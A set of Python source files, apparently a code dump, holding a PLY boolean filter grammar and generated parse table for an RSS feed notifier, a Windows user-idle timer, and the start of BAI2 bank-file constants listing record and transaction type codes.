strings.append(item.link)
if self.qualifier & AUTHOR:
strings.append(item.author)
if self.qualifier & CONTENT:
strings.append(item.description)
text = '\n'.join(strings)
word = self.word
if ignore_case:
text = text.lower()
word = word.lower()
if whole_word:
text = set(text.split())
if word in text:
return self.type == INCLUDE
else:
return self.type == EXCLUDE
def __str__(self):
type = TYPE_STR[self.type]
qualifier = QUALIFIER_STR[self.qualifier]
return '(%s, %s, "%s")' % (type, qualifier, self.word)
class AndRule(object):
def __init__(self, left, right):
self.left = left
self.right = right
def evaluate(self, item, ignore_case=True, whole_word=True):
a = self.left.evaluate(item, ignore_case, whole_word)
b = self.right.evaluate(item, ignore_case, whole_word)
return a and b
def __str__(self):
return '(%s and %s)' % (self.left, self.right)
class OrRule(object):
def __init__(self, left, right):
self.left = left
self.right = right
def evaluate(self, item, ignore_case=True, whole_word=True):
a = self.left.evaluate(item, ignore_case, whole_word)
b = self.right.evaluate(item, ignore_case, whole_word)
return a or b
def __str__(self):
return '(%s or %s)' % (self.left, self.right)
class NotRule(object):
def __init__(self, rule):
self.rule = rule
def evaluate(self, item, ignore_case=True, whole_word=True):
return not self.rule.evaluate(item, ignore_case, whole_word)
def __str__(self):
return '(not %s)' % (self.rule)
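# The grammar below accepts filters such as (illustrative examples, derived
# from the lexer and parser rules that follow):
#   python                   -> include items mentioning "python" in any field
#   -title:spam              -> exclude items whose title contains "spam"
#   link:foo and not "a b"   -> boolean combination; quotes allow spaces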
# Lexer Rules
reserved = {
'and': 'AND',
'or': 'OR',
'not': 'NOT',
}
tokens = [
'PLUS',
'MINUS',
'LPAREN',
'RPAREN',
'TITLE',
'LINK',
'AUTHOR',
'CONTENT',
'WORD',
] + reserved.values()
t_PLUS = r'\+'
t_MINUS = r'\-'
t_LPAREN = r'\('
t_RPAREN = r'\)'
def t_TITLE(t):
r'title:'
return t
def t_LINK(t):
r'link:'
return t
def t_AUTHOR(t):
r'author:'
return t
def t_CONTENT(t):
r'content:'
return t
def t_WORD(t):
r'(\'[^\']+\') | (\"[^\"]+\") | ([^ \n\t\r+\-()\'"]+)'
t.type = reserved.get(t.value, 'WORD')
if t.value[0] == '"' and t.value[-1] == '"':
t.value = t.value[1:-1]
if t.value[0] == "'" and t.value[-1] == "'":
t.value = t.value[1:-1]
return t
t_ignore = ' \n\t\r'
def t_error(t):
raise Exception('Illegal character %r' % t.value[0])
# Parser Rules
precedence = (
('left', 'OR'),
('left', 'AND'),
('right', 'NOT')
)
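# PLY resolves shift/reduce conflicts with this table: OR binds loosest,
# NOT tightest, giving conventional boolean operator precedence.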
def p_filter(t):
'filter : expression'
t[0] = t[1]
def p_expression_rule(t):
'expression : rule'
t[0] = t[1]
def p_expression_and(t):
'expression : expression AND expression'
t[0] = AndRule(t[1], t[3])
def p_expression_or(t):
'expression : expression OR expression'
t[0] = OrRule(t[1], t[3])
def p_expression_not(t):
'expression : NOT expression'
t[0] = NotRule(t[2])
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_rule(t):
'rule : type qualifier WORD'
t[0] = Rule(t[1], t[2], t[3])
def p_type(t):
'''type : PLUS
| MINUS
| empty'''
t[0] = t[1]
def p_qualifier(t):
'''qualifier : TITLE
| LINK
| AUTHOR
| CONTENT
| empty'''
t[0] = t[1]
def p_empty(t):
'empty :'
pass
def p_error(t):
raise Exception('Syntax error at %r' % (t.value if t else 'end of input'))
import ply.lex as lex
import ply.yacc as yacc
lexer = lex.lex()
parser = yacc.yacc()
def parse(text):
return parser.parse(text, lexer=lexer)
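# Usage sketch (illustrative, not part of the original module; feed items
# are assumed to expose the title, link, author and description attributes
# that Rule.evaluate reads):
#   rule = parse('title:python and not spam')
#   keep = rule.evaluate(item)  # True if the item passes the filter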
if __name__ == '__main__':
while True:
text = raw_input('> ')
print parse(text)
|
yabhinav/FeedNotifier | parsetab.py |
# parsetab.py
# This file is automatically generated. Do not edit.
_tabversion = '3.2'
_lr_method = 'LALR'
_lr_signature = '\x03\xd8\xc9Q1\x0e\x13W\xf5\xf7\xacu\x8b$z\xd4'
_lr_action_items = {'AND':([2,8,16,17,20,21,22,23,],[-2,18,18,-5,-7,-6,-3,18,]),'WORD':([0,1,3,5,6,7,9,10,11,12,13,14,15,18,19,],[-16,-16,-9,-8,-16,-16,-10,20,-13,-11,-14,-12,-15,-16,-16,]),'AUTHOR':([0,1,3,5,6,7,9,18,19,],[-16,11,-9,-8,-16,-16,-10,-16,-16,]),'TITLE':([0,1,3,5,6,7,9,18,19,],[-16,12,-9,-8,-16,-16,-10,-16,-16,]),'OR':([2,8,16,17,20,21,22,23,],[-2,19,19,-5,-7,-6,-3,-4,]),'CONTENT':([0,1,3,5,6,7,9,18,19,],[-16,13,-9,-8,-16,-16,-10,-16,-16,]),'LINK':([0,1,3,5,6,7,9,18,19,],[-16,14,-9,-8,-16,-16,-10,-16,-16,]),'LPAREN':([0,6,7,18,19,],[6,6,6,6,6,]),'NOT':([0,6,7,18,19,],[7,7,7,7,7,]),'PLUS':([0,6,7,18,19,],[5,5,5,5,5,]),'$end':([2,4,8,17,20,21,22,23,],[-2,0,-1,-5,-7,-6,-3,-4,]),'MINUS':([0,6,7,18,19,],[3,3,3,3,3,]),'RPAREN':([2,16,17,20,21,22,23,],[-2,21,-5,-7,-6,-3,-4,]),}
_lr_action = { }
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = { }
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'qualifier':([1,],[10,]),'type':([0,6,7,18,19,],[1,1,1,1,1,]),'rule':([0,6,7,18,19,],[2,2,2,2,2,]),'filter':([0,],[4,]),'expression':([0,6,7,18,19,],[8,16,17,22,23,]),'empty':([0,1,6,7,18,19,],[9,15,9,9,9,9,]),}
_lr_goto = { }
for _k, _v in _lr_goto_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_goto: _lr_goto[_x] = { }
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> filter","S'",1,None,None,None),
('filter -> expression','filter',1,'p_filter','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',161),
('expression -> rule','expression',1,'p_expression_rule','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',165),
('expression -> expression AND expression','expression',3,'p_expression_and','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',169),
('expression -> expression OR expression','expression',3,'p_expression_or','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',173),
('expression -> NOT expression','expression',2,'p_expression_not','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',177),
('expression -> LPAREN expression RPAREN','expression',3,'p_expression_group','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',181),
('rule -> type qualifier WORD','rule',3,'p_rule','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',185),
('type -> PLUS','type',1,'p_type','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',189),
('type -> MINUS','type',1,'p_type','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',190),
('type -> empty','type',1,'p_type','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',191),
('qualifier -> TITLE','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',195),
('qualifier -> LINK','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',196),
('qualifier -> AUTHOR','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',197),
('qualifier -> CONTENT','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',198),
('qualifier -> empty','qualifier',1,'p_qualifier','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',199),
('empty -> <empty>','empty',0,'p_empty','C:\\Documents and Settings\\<NAME>\\My Documents\\Workspace\\Feed Notifier 2\\filters.py',203),
]
|
yabhinav/FeedNotifier | idle.py | import sys
if sys.platform == 'win32':
from ctypes import *
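# LASTINPUTINFO mirrors the Win32 structure of the same name; dwTime is
# the tick count (milliseconds since boot) of the last user input event.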
class LASTINPUTINFO(Structure):
_fields_ = [
('cbSize', c_uint),
('dwTime', c_int),
]
def get_idle_duration():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
if windll.user32.GetLastInputInfo(byref(lastInputInfo)):
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
else:
return 0
else:
def get_idle_duration():
return 0
if __name__ == '__main__':
import time
while True:
duration = get_idle_duration()
print 'User idle for %.2f seconds.' % duration
time.sleep(1)
|
yabhinav/FeedNotifier | dummy.py | <reponame>yabhinav/FeedNotifier
# used for dummy.__file__ to setup path
|
ankurCES/bai-file-processor | bai_file_processor/constants.py | from collections import namedtuple
from enum import Enum
CONTINUATION_CODE = '88'
class RecordCode(Enum):
file_header = '01'
group_header = '02'
account_identifier = '03'
transaction_detail = '16'
account_trailer = '49'
continuation = '88'
group_trailer = '98'
file_trailer = '99'
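# Record codes are the two-digit prefixes that identify each line of a
# BAI2 file; '88' continues the preceding record.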
class GroupStatus(Enum):
update = '1'
deletion = '2'
correction = '3'
test_only = '4'
class AsOfDateModifier(Enum):
interim_previous_day = '1'
final_previous_day = '2'
interim_same_day = '3'
final_same_day = '4'
class FundsType(Enum):
unknown_availability = 'Z'
immediate_availability = '0'
one_day_availability = '1'
two_day_availability = '2'
distributed_availability_simple = 'S'
value_dated = 'V'
distributed_availability = 'D'
class TypeCodeTransaction(Enum):
credit = 'credit'
debit = 'debit'
misc = 'misc'
class TypeCodeLevel(Enum):
status = 'status'
detail = 'detail'
summary = 'summary'
TypeCode = namedtuple('TypeCode', ['code', 'transaction', 'level', 'description'])
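# Sketch of a lookup pattern (not part of the original module): index the
# table below by code for O(1) access.
#   TYPE_CODE_INDEX = {tc.code: tc for tc in TypeCodes}
#   TYPE_CODE_INDEX['010'].description  # -> 'Opening Ledger'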
TypeCodes = [
TypeCode('010', None, TypeCodeLevel.status, 'Opening Ledger'),
TypeCode('011', None, TypeCodeLevel.status, 'Average Opening Ledger MTD'),
TypeCode('012', None, TypeCodeLevel.status, 'Average Opening Ledger YTD'),
TypeCode('015', None, TypeCodeLevel.status, 'Closing Ledger'),
TypeCode('020', None, TypeCodeLevel.status, 'Average Closing Ledger MTD'),
TypeCode('021', None, TypeCodeLevel.status, 'Average Closing Ledger – Previous Month'),
TypeCode('022', None, TypeCodeLevel.status, 'Aggregate Balance Adjustments'),
TypeCode('024', None, TypeCodeLevel.status, 'Average Closing Ledger YTD – Previous Month'),
TypeCode('025', None, TypeCodeLevel.status, 'Average Closing Ledger YTD'),
TypeCode('030', None, TypeCodeLevel.status, 'Current Ledger'),
TypeCode('037', None, TypeCodeLevel.status, 'ACH Net Position'),
TypeCode('039', None, TypeCodeLevel.status, 'Opening Available + Total Same-Day ACH DTC Deposit'),
TypeCode('040', None, TypeCodeLevel.status, 'Opening Available'),
TypeCode('041', None, TypeCodeLevel.status, 'Average Opening Available MTD'),
TypeCode('042', None, TypeCodeLevel.status, 'Average Opening Available YTD'),
TypeCode('043', None, TypeCodeLevel.status, 'Average Available – Previous Month'),
TypeCode('044', None, TypeCodeLevel.status, 'Disbursing Opening Available Balance'),
TypeCode('045', None, TypeCodeLevel.status, 'Closing Available'),
TypeCode('050', None, TypeCodeLevel.status, 'Average Closing Available MTD'),
TypeCode('051', None, TypeCodeLevel.status, 'Average Closing Available – Last Month'),
TypeCode('054', None, TypeCodeLevel.status, 'Average Closing Available YTD – Last Month'),
TypeCode('055', None, TypeCodeLevel.status, 'Average Closing Available YTD'),
TypeCode('056', None, TypeCodeLevel.status, 'Loan Balance'),
TypeCode('057', None, TypeCodeLevel.status, 'Total Investment Position'),
TypeCode('059', None, TypeCodeLevel.status, 'Current Available (CRS Suppressed)'),
TypeCode('060', None, TypeCodeLevel.status, 'Current Available'),
TypeCode('061', None, TypeCodeLevel.status, 'Average Current Available MTD'),
TypeCode('062', None, TypeCodeLevel.status, 'Average Current Available YTD'),
TypeCode('063', None, TypeCodeLevel.status, 'Total Float'),
TypeCode('065', None, TypeCodeLevel.status, 'Target Balance'),
TypeCode('066', None, TypeCodeLevel.status, 'Adjusted Balance'),
TypeCode('067', None, TypeCodeLevel.status, 'Adjusted Balance MTD'),
TypeCode('068', None, TypeCodeLevel.status, 'Adjusted Balance YTD'),
TypeCode('070', None, TypeCodeLevel.status, '0-Day Float'),
TypeCode('072', None, TypeCodeLevel.status, '1-Day Float'),
TypeCode('073', None, TypeCodeLevel.status, 'Float Adjustment'),
TypeCode('074', None, TypeCodeLevel.status, '2 or More Days Float'),
TypeCode('075', None, TypeCodeLevel.status, '3 or More Days Float'),
TypeCode('076', None, TypeCodeLevel.status, 'Adjustment to Balances'),
TypeCode('077', None, TypeCodeLevel.status, 'Average Adjustment to Balances MTD'),
TypeCode('078', None, TypeCodeLevel.status, 'Average Adjustment to Balances YTD'),
TypeCode('079', None, TypeCodeLevel.status, '4-Day Float'),
TypeCode('080', None, TypeCodeLevel.status, '5-Day Float'),
TypeCode('081', None, TypeCodeLevel.status, '6-Day Float'),
TypeCode('082', None, TypeCodeLevel.status, 'Average 1-Day Float MTD'),
TypeCode('083', None, TypeCodeLevel.status, 'Average 1-Day Float YTD'),
TypeCode('084', None, TypeCodeLevel.status, 'Average 2-Day Float MTD'),
TypeCode('085', None, TypeCodeLevel.status, 'Average 2-Day Float YTD'),
TypeCode('086', None, TypeCodeLevel.status, 'Transfer Calculation'),
TypeCode('087', None, TypeCodeLevel.status, 'MTD Ave Collected'),
TypeCode('088', None, TypeCodeLevel.status, 'MTD Ave Neg Collected'),
TypeCode('100', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credits'),
TypeCode('101', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credit Amount MTD'),
TypeCode('102', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Number of Credits'),
TypeCode('105', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Credits Not Detailed'),
TypeCode('106', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Deposits Subject to Float'),
TypeCode('107', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Adjustment Credits YTD'),
TypeCode('108', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Credit (Any Type)'),
TypeCode('109', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Current Day Total Lockbox Deposits'),
TypeCode('110', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Lockbox Deposits'),
TypeCode('115', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Lockbox Deposit'),
TypeCode('116', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in Lockbox Deposit'),
TypeCode('118', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Lockbox Adjustment Credit'),
TypeCode('120', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'EDI* Transaction Credit'),
TypeCode('121', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'EDI Transaction Credit'),
TypeCode('122', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'EDIBANX Credit Received'),
TypeCode('123', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'EDIBANX Credit Return'),
TypeCode('130', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Concentration Credits'),
TypeCode('131', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total DTC Credits'),
TypeCode('135', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'DTC Concentration Credit'),
TypeCode('136', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in DTC Deposit'),
TypeCode('140', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ACH Credits'),
TypeCode('142', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Credit Received'),
TypeCode('143', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in ACH Deposit'),
TypeCode('145', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Concentration Credit'),
TypeCode('146', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Bank Card Deposits'),
TypeCode('147', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Bank Card Deposit'),
TypeCode('150', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Preauthorized Payment Credits'),
TypeCode('155', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Preauthorized Draft Credit'),
TypeCode('156', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in PAC Deposit'),
TypeCode('159', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Real Time Payment (RTP) Credit Total'),
TypeCode('160', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ACH Disbursing Funding Credits'),
TypeCode('162', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Corporate Trade Payment Settlement'),
TypeCode('163', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Corporate Trade Payment Credits'),
TypeCode('164', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Corporate Trade Payment Credit'),
TypeCode('165', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Preauthorized ACH Credit'),
TypeCode('166', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Settlement'),
TypeCode('167', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'ACH Settlement Credits'),
TypeCode('168', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'ACH Return Item or Adjustment Settlement'),
TypeCode('169', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Miscellaneous ACH Credit'),
TypeCode('170', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Other Check Deposits'),
TypeCode('171', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Loan Deposit'),
TypeCode('172', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Deposit Correction'),
TypeCode('173', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Bank-Prepared Deposit'),
TypeCode('174', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Other Deposit'),
TypeCode('175', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Check Deposit Package'),
TypeCode('176', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Re-presented Check Deposit'),
TypeCode('178', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'List Post Credits'),
TypeCode('180', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Loan Proceeds'),
TypeCode('182', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Bank-Prepared Deposits'),
TypeCode('184', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Draft Deposit'),
TypeCode('185', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Deposits'),
TypeCode('186', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Cash Letter Credits'),
TypeCode('187', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cash Letter Credit'),
TypeCode('188', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Cash Letter Adjustments'),
TypeCode('189', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cash Letter Adjustment'),
TypeCode('190', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Incoming Money Transfers'),
TypeCode('191', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Incoming Internal Money Transfer'),
TypeCode('195', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Incoming Money Transfer'),
TypeCode('196', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Money Transfer Adjustment'),
TypeCode('198', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Compensation'),
TypeCode('200', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Automatic Transfer Credits'),
TypeCode('201', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Automatic Transfer Credit'),
TypeCode('202', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Bond Operations Credit'),
TypeCode('205', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Book Transfer Credits'),
TypeCode('206', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Book Transfer Credit'),
TypeCode('207', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Money Transfer Credits'),
TypeCode('208', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual International Money Transfer Credit'),
TypeCode('210', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Credits'),
TypeCode('212', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Letter of Credit'),
TypeCode('213', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Letter of Credit'),
TypeCode('214', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Exchange of Credit'),
TypeCode('215', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Letters of Credit'),
TypeCode('216', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Remittance Credit'),
TypeCode('218', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Collection Credit'),
TypeCode('221', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Check Purchase'),
TypeCode('222', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Checks Deposited'),
TypeCode('224', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Commission'),
TypeCode('226', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'International Money Market Trading'),
TypeCode('227', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Standing Order'),
TypeCode('229', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous International Credit'),
TypeCode('230', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Security Credits'),
TypeCode('231', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Collection Credits'),
TypeCode('232', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sale of Debt Security'),
TypeCode('233', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Securities Sold'),
TypeCode('234', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sale of Equity Security'),
TypeCode('235', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Matured Reverse Repurchase Order'),
TypeCode('236', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Maturity of Debt Security'),
TypeCode('237', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Collection Credit'),
TypeCode('238', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Collection of Dividends'),
TypeCode('239', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Bankers’ Acceptance Credits'),
TypeCode('240', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Coupon Collections – Banks'),
TypeCode('241', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Bankers’ Acceptances'),
TypeCode('242', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Collection of Interest Income'),
TypeCode('243', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Matured Fed Funds Purchased'),
TypeCode('244', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Interest/Matured Principal Payment'),
TypeCode('245', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Monthly Dividends'),
TypeCode('246', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Commercial Paper'),
TypeCode('247', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Capital Change'),
TypeCode('248', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Savings Bonds Sales Adjustment'),
TypeCode('249', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous Security Credit'),
TypeCode('250', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Checks Posted and Returned'),
TypeCode('251', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Debit Reversals'),
TypeCode('252', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Debit Reversal'),
TypeCode('254', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Posting Error Correction Credit'),
TypeCode('255', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Check Posted and Returned'),
TypeCode('256', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ACH Return Items'),
TypeCode('257', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual ACH Return Item'),
TypeCode('258', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Reversal Credit'),
TypeCode('260', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Rejected Credits'),
TypeCode('261', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Rejected Credit'),
TypeCode('263', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Overdraft'),
TypeCode('266', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Return Item'),
TypeCode('268', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Return Item Adjustment'),
TypeCode('270', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ZBA Credits'),
TypeCode('271', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Net Zero-Balance Amount'),
TypeCode('274', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cumulative** ZBA or Disbursement Credits'),
TypeCode('275', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Credit'),
TypeCode('276', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Float Adjustment'),
TypeCode('277', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Credit Transfer'),
TypeCode('278', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Credit Adjustment'),
TypeCode('280', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Controlled Disbursing Credits'),
TypeCode('281', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Controlled Disbursing Credit'),
TypeCode('285', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total DTC Disbursing Credits'),
TypeCode('286', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual DTC Disbursing Credit'),
TypeCode('294', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ATM Credits'),
TypeCode('295', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ATM Credit'),
TypeCode('301', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Commercial Deposit'),
TypeCode('302', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Correspondent Bank Deposit'),
TypeCode('303', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Wire Transfers In – FF'),
TypeCode('304', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Wire Transfers In – CHF'),
TypeCode('305', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Fed Funds Sold'),
TypeCode('306', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Fed Funds Sold'),
TypeCode('307', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Trust Credits'),
TypeCode('308', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Trust Credit'),
TypeCode('309', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Value - Dated Funds'),
TypeCode('310', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Commercial Deposits'),
TypeCode('315', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Credits – FF'),
TypeCode('316', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Credits – CHF'),
TypeCode('318', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Foreign Check Purchased'),
TypeCode('319', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Late Deposit'),
TypeCode('320', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Sold – FF'),
TypeCode('321', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Sold – CHF'),
TypeCode('324', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Matured – FF'),
TypeCode('325', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Matured – CHF'),
TypeCode('326', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Interest'),
TypeCode('327', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Matured'),
TypeCode('328', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Interest – FF'),
TypeCode('329', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Interest – CHF'),
TypeCode('330', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Escrow Credits'),
TypeCode('331', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Escrow Credit'),
TypeCode('332', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Securities Credits – FF'),
TypeCode('336', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Securities Credits – CHF'),
TypeCode('338', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Sold'),
TypeCode('340', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Broker Deposits'),
TypeCode('341', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Broker Deposits – FF'),
